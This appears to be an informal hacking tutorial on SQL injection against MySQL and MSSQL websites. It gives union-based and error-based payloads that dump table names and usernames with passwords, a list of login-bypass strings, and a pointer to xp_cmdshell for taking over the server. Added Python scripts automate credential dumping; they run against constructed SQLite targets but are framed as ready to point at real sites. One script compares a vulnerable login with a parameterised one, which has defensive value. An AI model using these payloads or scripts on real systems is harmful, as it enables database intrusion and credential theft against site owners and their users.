Let's start with MySQL:
MySQL has only the 2 cases mentioned above (5+, which has information_schema, and below 5, which does not). You need to know the following things about the DB you are attacking:
# Number of columns
# Table names
# Column names
# Let's start with the union attack, the most common one, every n00b should know it :p
=> http://test.com/index.php?id=1 order by 10--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 7--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5--
Whoa !! the page is loading normally
It means, number of columns => 5
(ORDER BY n errors as soon as n is bigger than the number of columns in the select, so the count is the largest n that loads normally. Strictly you should also check 6 before settling on 5. Also note that in MySQL "--" only starts a comment when a space follows it, so in a URL write it as "--+" or "-- -".)
You can do it with MSSQL as well.
# Now the next part. I'm using a UNION SELECT statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't give you anything, change the first part of the query to a negative value, so the original query returns no row and only the injected row gets displayed.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on your screen. In my case it is 2. Now we know that column 2 will echo data back to us. :D
# Getting the MySQL version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get it with this, try this:
=> http://test.com/index.php?id=-1 union select 1,version(),3,4,5--
Now you will get the version. It can be:
# 5+ (information_schema is there, first part below)
# below 5 (no information_schema, you have to guess, second part below)
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
The columns I get back for the admin table are:
user_name
user_password
sex
uid
We only need to know username & pass, so we reject the other two. Okay ? :D
The next query will be for extracting the final data I need :D
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
where 0x3a is the hex value of => :
(group_concat joins every row into one string, so you get all users in a single request instead of one row per request.)
VOILA !
I got the username & pass, it is => shubham:password
The password can also be stored as a hash instead of plaintext. Then you crack it: use a few online hash lookup sites, or a software I know => Password Pro
This was all for MySQL 5+
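The whole MySQL 5+ procedure above (ORDER BY to count columns, UNION with markers to find the echoing column, then group_concat over information_schema and the target table) as one script. This is an added example, not code from the original paper. The target is constructed: an in-memory SQLite database behind a deliberately injectable fetch() that stands in for http://test.com/index.php?id=, and the attack functions only talk to it through fetch(), so swapping in a real HTTP fetch is the only change needed. SQLite spellings replace the MySQL ones (sqlite_version() for @@version, sqlite_master for information_schema.tables, pragma_table_info() for information_schema.columns, char(58) for 0x3a); the MySQL form of each query is in the comments.

```python
"""Union-based SQL injection, automated against a constructed target."""
import sqlite3

# --- constructed target: plays the role of index.php?id= ------------------
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT, views INTEGER);
INSERT INTO news VALUES (1, 'Hello world', 'first post', 'editor', 10);
CREATE TABLE admin(uid INTEGER, user_name TEXT, user_password TEXT, sex TEXT);
INSERT INTO admin VALUES (1, 'shubham', 'password', 'm');
INSERT INTO admin VALUES (2, 'guest', 'guest123', 'f');
""")


def fetch(id_param: str) -> str:
    """The parameter is pasted straight into the SQL; the page echoes column 2
    (title) of the first row, or an error page when the query fails."""
    sql = f"SELECT * FROM news WHERE id={id_param}"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "<h1>Database error</h1>"
    return f"<h1>{row[1]}</h1>" if row else "<h1>No such article</h1>"


# --- attacker side: only ever calls fetch() ------------------------------
def echoed(page: str) -> str:
    """Pull the reflected value out of the page's <h1>."""
    return page[page.index("<h1>") + 4:page.index("</h1>")]


def find_column_count(fetch, max_cols: int = 32) -> int:
    """ORDER BY n errors as soon as n exceeds the column count, so the count
    is the last n that loads normally. '-- -' is the MySQL-safe comment."""
    for n in range(1, max_cols + 1):
        if "error" in fetch(f"1 order by {n}-- -").lower():
            return n - 1
    raise RuntimeError("no ORDER BY error up to max_cols; not injectable this way?")


def find_reflected_columns(fetch, ncols: int) -> list:
    """UNION ALL SELECT distinctive markers with a negative id so only the
    injected row comes back; markers that show up are the echoing columns."""
    markers = [7000 + i for i in range(1, ncols + 1)]
    page = fetch(f"-1 union all select {','.join(map(str, markers))}-- -")
    return [i for i, m in enumerate(markers, start=1) if str(m) in page]


def extract(fetch, ncols: int, col: int, expr: str, tail: str = "") -> str:
    """Put expr in the reflected column and plain numbers in the others."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = expr
    return echoed(fetch(f"-1 union all select {','.join(cols)}{tail}-- -"))


def dump(fetch) -> dict:
    """Run the full chain and return everything learned."""
    n = find_column_count(fetch)
    col = find_reflected_columns(fetch, n)[0]
    return {
        "columns": n,
        "reflected": col,
        # MySQL: @@version or version()
        "version": extract(fetch, n, col, "sqlite_version()"),
        # MySQL: group_concat(table_name) from information_schema.tables
        #        where table_schema=database()
        "tables": extract(fetch, n, col, "group_concat(name)",
                          " from sqlite_master where type='table'"),
        # MySQL: group_concat(column_name) from information_schema.columns
        #        where table_name='admin'
        "admin_columns": extract(fetch, n, col, "group_concat(name)",
                                 " from pragma_table_info('admin')"),
        # MySQL: group_concat(user_name,0x3a,user_password) from admin
        "creds": extract(fetch, n, col,
                         "group_concat(user_name || char(58) || user_password)",
                         " from admin"),
    }


if __name__ == "__main__":
    for key, value in dump(fetch).items():
        print(f"{key}: {value}")
```

The attacker functions never look at the database directly; everything comes back through the page, which is the situation on a real target. If your reflected column is numeric on the real site, wrap the expression in a string-typed column instead, otherwise MySQL will happily return it but MSSQL will throw a conversion error.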
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Let's start with MySQL below 5
Version 4 or anything below 5 does not contain any => information_schema
so you have to guess the table and column names, like people guess while playing KBC (Who Wants to Be a Millionaire)
hahaha :D
We know the number of columns, that is 5.
=> Let's start guessing the table:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ This one gives me an error (no such table)
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Voila, I guessed right, you must be thinking ShubhaM is a genius xD :p
(Careful with case: on Linux MySQL table names are usually case-sensitive, so Admin and admin need not be the same table; on Windows they are.)
=> Next part is guessing the columns:
As we had done earlier we had found the vulnerable column is 2, so let's proceed further.
Guess something similar to a username.
=> http://test.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got an error. Retrying...
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
Hurray ! It worked, baby, & I got the username :D...!
=> Let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error
One more try
=> http://test.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--
hahaha...got the pass !!!
This is the end of MySQL below 5 union.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# MySQL Blind
Most fu*king part. I really hate this. :X :P :X
Q. What is blind SQL injection?
A. Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnera
Hope you know how to test for an SQLi vulnerability, so I'm leaving that part.
# Bypassing authentication - common for n00bs:
These work when the login query pastes your input between quotes. The different variants exist because the query may use ' or " around the value, may wrap it in parentheses, and because the comment style depends on the backend: -- and /* */ work on both MySQL and MSSQL, # only on MySQL.
+------------------------------+
| ' or 1=1 --                  |
| a' or 1=1 --                 |
| " or 1=1 --                  |
| a" or 1=1 --                 |
| ' or 1=1 #                   |
| " or 1=1 #                   |
| or 1=1 --                    |
| ' or 'x'='x                  |
| " or "x"="x                  |
| ') or ('x'='x                |
| ") or ("x"="x                |
| ' or username LIKE '%admin%  |
+------------------------------+
| USERNAME: ' or 1/*           |
| PASSWORD: */ =1 --           |
+------------------------------+
| USERNAME: admin' or 'a'='a   |
| PASSWORD: '#                 |
+------------------------------+
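The login query those strings are written for, next to the version that is immune to all of them, as an added example that is not from the original paper. Everything is constructed: an in-memory SQLite users table, a login that builds its query by string concatenation the way the list above assumes, and the same login with bound parameters. Three payloads from the list are run through both; the "'#" variant is left out of the runnable list because # is a MySQL-only comment.

```python
"""Authentication bypass: the vulnerable login and the hardened one."""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'correct horse battery staple');
""")


def login_vulnerable(username: str, password: str):
    """Credentials pasted into the SQL: a quote in the input ends the string
    literal and the rest of the input becomes part of the query."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_safe(username: str, password: str):
    """Parameterised query: the values travel separately from the SQL text,
    so quotes and comment markers inside them are just characters."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# (username, password) pairs taken from the list above
PAYLOADS = [
    ("' or 1=1 -- ", "whatever"),        # comment swallows the password check
    ("' or 'x'='x", "' or 'x'='x"),      # no comment needed: ... OR 'x'='x'
    ("' or 1/*", "*/ =1 -- "),           # /* */ joins both fields into 'or 1 =1'
]


def run() -> dict:
    """Who each payload logs in as, against each implementation."""
    return {
        "vulnerable": [login_vulnerable(u, p) for u, p in PAYLOADS],
        "safe": [login_safe(u, p) for u, p in PAYLOADS],
        "safe_real_creds": login_safe("admin", "correct horse battery staple"),
    }


if __name__ == "__main__":
    print(run())
```

The hardened version is not "escaping better"; it never lets the input touch the SQL grammar at all, which is why none of the quote/comment tricks have anything to work on.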
=> MSSQL injection with union attack:
I love union <3
I've got this site to test my power on => http://test.com/news.asp?id=1
Ok, let's start
# First find out the number of columns. Counting one by one is boring :P so I'll use the "hit & trial method" that I had learnt somewhere in maths :D
ok. => http://test.com/news.asp?id=1 order by 6--
We'll keep hitting (lowering the number) until the error goes away. The error looks like this one (here it is for order by 5):
[error]
Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the select list.
/showthread.asp, line 9
[/error]
again trying to hit,
=> http://test.com/news.asp?id=1 order by 4--
whoa !! worked :D
# Now I'll use union again
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,44--
# We will see "11" or "22" or "33" or "44" appear at some point in the returned page. ("and 1=2" makes the original query return nothing, the same idea as the negative id in MySQL, so the first row shown is ours.)
WOW ! I found 44 on my laptop's screen, so I'll replace 44 with @@version
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,@@version--
^ So, this gives me the version information.
Let's continue grabbing the rest of the data. I'm using information_schema, like we did in MySQL :P
I think concat does not work in MSSQL, never tried it either; even if it works, I don't know how to ! :P coz I'm just a 10th std student. No idea abt SQL :P
So the next,
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--
^ this gives me the name of the first table, i.e. => threads
I'll use the first table to get the next one & so on... until you get what you want
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--
^ This gives me the name of the next table, i.e. => users :D
Users is the required table for me which contains the info I need :D
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--
^ this gives me the column name, i.e. uname. As we did to find the tables, the same we'll do with columns. Ok? :)
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and column_name not in ('uname')--
^ this gives me the next column, i.e. upass :D
Lolz, now I need data from these two columns :D
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
^ same with upass
This time my uname is admin. So to find the next row, we do
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--
Further as well, we can extract the rest of the data. Hope you understood this much !!
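The "not in" walk just shown, automated. This is an added example, not code from the original paper. The target is constructed: an in-memory SQLite database behind fetch(), standing in for news.asp?id=, which echoes only column 4 of the first row it gets, so there is no group_concat shortcut and every extra name costs one more request with everything seen so far in the NOT IN list. The same loop serves tables, columns and rows. SQLite's sqlite_master and pragma_table_info() stand in for information_schema.tables and .columns; the MSSQL form of each query is in the comments, and the table and user names are made up.

```python
"""One-value-per-request enumeration with a growing NOT IN list."""
import sqlite3

# --- constructed target: plays the role of news.asp?id= ------------------
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE threads(news_id INTEGER, news_author TEXT, news_detail TEXT, title TEXT);
INSERT INTO threads VALUES (1, 'editor', 'body text', 'Hello world');
CREATE TABLE users(uname TEXT, upass TEXT);
INSERT INTO users VALUES ('admin', 'admin123');
INSERT INTO users VALUES ('shubham', 'password');
""")
NOT_FOUND = "No such article"


def fetch(id_param: str) -> str:
    """Echoes column 4 (title) of the first row only, like the page above."""
    sql = ("SELECT news_id,news_author,news_detail,title FROM threads "
           f"WHERE news_id={id_param}")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "<h1>Database error</h1>"
    return f"<h1>{row[3]}</h1>" if row else f"<h1>{NOT_FOUND}</h1>"


# --- attacker side ---------------------------------------------------------
def one_value(fetch, column: str, source: str) -> str:
    """'and 1=2' empties the real result so the first row is our UNION row.
    Column 4 must be character-typed on MSSQL or you get a conversion error."""
    page = fetch(f"1 and 1=2 union select 11,22,33,{column} from {source}-- -")
    return page[page.index("<h1>") + 4:page.index("</h1>")]


def walk(fetch, column: str, source: str, max_rows: int = 100) -> list:
    """Repeat the query, excluding everything already seen, until nothing
    comes back. `source` must already carry a WHERE so we can AND onto it."""
    seen = []
    while len(seen) < max_rows:
        # quote each seen value; double embedded quotes so they stay inside
        exclude = ",".join("'" + v.replace("'", "''") + "'" for v in seen) or "''"
        value = one_value(fetch, column, f"{source} and {column} not in ({exclude})")
        if value == NOT_FOUND:
            break
        seen.append(value)
    return seen


def dump_users(fetch) -> dict:
    """Tables, then the users columns, then every uname with its upass."""
    # MSSQL: table_name from information_schema.tables where 1=1
    tables = walk(fetch, "name", "sqlite_master where type='table'")
    # MSSQL: column_name from information_schema.columns where table_name='users'
    columns = walk(fetch, "name", "pragma_table_info('users') where 1=1")
    # MSSQL: uname from users where 1=1, then upass from users where uname='...'
    creds = {u: one_value(fetch, "upass", f"users where uname='{u}'")
             for u in walk(fetch, "uname", "users where 1=1")}
    return {"tables": tables, "columns": columns, "creds": creds}


if __name__ == "__main__":
    print(dump_users(fetch))
```

The request count grows with the number of rows, which is the price of not having group_concat; on a big users table you would rather pull upass in the same request as uname (uname+':'+upass on MSSQL) than make two walks.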
Now the next part is MSSQL blind :D
==
# MSSQL blind:
# testing-
the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
[/error]
It shows the second column of the first table is news_author :D
The third column can be obtained using the 2nd one: add every column you already know to the GROUP BY and SQL Server names the next one it is missing.
=> http://test.com/news.asp?id=1 GROUP BY news.news_id,news.news_author HAVING 1=1--
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
[/error]
The third column is => news_detail
and so on...
Now,
## ODBC error message attack with "CONVERT"
Here I'll show you how to grab the MSSQL version, DB name and user name.
=> http://test.com/news.asp?id=1+and+1=conv...version)--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)' to data type int.
/page.asp, line 9
[/error]
Therefore I know => the version of MSSQL and the OS (Windows NT 5.2 = Windows Server 2003)
(The trick: converting a string to int fails, and SQL Server puts the string it could not convert into the error message, so any single-value string expression can be read straight out of the error page.)
Other things you can grab by replacing @@version with:
# db_name()
# user_name()
If the user name comes back as => sa
it means you may be able to use xp_cmdshell (it is off by default on SQL Server 2005 and later, but sa can switch it on with sp_configure), which I'll tell you about later, to enable RDP, i.e. remote desktop, & hack the whole box :P :D
# Obtaining tables
=> http://site.com/news.asp?id=1+and+1=conv...tables))--
Result is threads, so
Next one,
=> http://test.com/news.asp?id=1+and+1=conv...able_name+not+in+('threads')))--
& so on... you can continue further now.
The next table for me is users, which I found using the threads one..! So now I need the columns from the table users, okay ? :)
# Finding columns
=> http://test.com/news.asp?id=1+and+1=conv...users'))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
[/error]
First column is uname ;)
So I continue
=> http://test.com/news.asp?id=1+and+1=conv...e='users'+and+column_name+not+in+('uname')))--
^ as we had done earlier :D
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
[/error]
For getting more column names, we only append the columns we already know to the not in list, like we did for table names.
# Extracting data
=> http://test.com/news.asp?id=1+and+1=conv...+users))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
[/error]
Same with upass ;)
For the rest you are now on your own in MSSQL ;)
I'm leaving it here.... most of it is done !!! Now the only thing left is to use your brain. ;)
# SOAP injection
Leaving this part :P I'll later make a paper on it ;)
End of MSSQL ... :P
# xp_cmdshell
I'd recommend using some automated tools. I'm not in the mood to write on xp_cmdshell, though it consists of simple cmd commands to activate RDP & using net user.
Hackforums.net
Hackersbay.in
Academyofhacking.com
Indishell.in
packetstormsecurity.org
###
Greetz To
###
greetz- C00lt04d,Cyb3rgr00f,Reb0rn,c0d3br34k3r,3thicaln00b,Cyb3rS4m,g00gl3 w4rri0r & All my friends at AOH & Indishell.
special thanks- H4ck0lic, Bad Man :)
###
End of this paper